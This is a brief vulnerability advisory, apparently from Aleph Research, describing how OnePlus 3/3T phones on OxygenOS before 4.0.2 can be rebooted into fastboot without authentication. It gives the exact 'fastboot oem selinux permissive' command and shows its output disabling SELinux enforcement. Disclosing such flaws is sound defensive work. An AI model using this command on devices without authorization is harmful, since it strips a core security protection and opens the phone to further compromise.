<--

OnePlus 3/3T OxygenOS SELinux Security Bypass

Aleph Research Advisory

Identifier

Severity

High

Products

  1. OnePlus 3T
  2. OnePlus 3

Vulnerable Version

OxygenOS prior to 4.0.2

Technical Details

The attacker can reboot a OnePlus 3/3T device into the fastboot mode, which could be done without any authentication. A physical attacker can press the “Volume Up” button during device boot, where an attacker with ADB access can issue the adb reboot bootloader command. Then, the attacker can put the platform’s SELinux in permissive mode, which severely weakens it, by issuing:

fastboot oem selinux permissive
...
OKAY [  0.045s]
finished. total time: 0.047s

....

OnePlus3:/ $ getenforce
Permissive
OnePlus3:/ $

Timeline

Credit

External References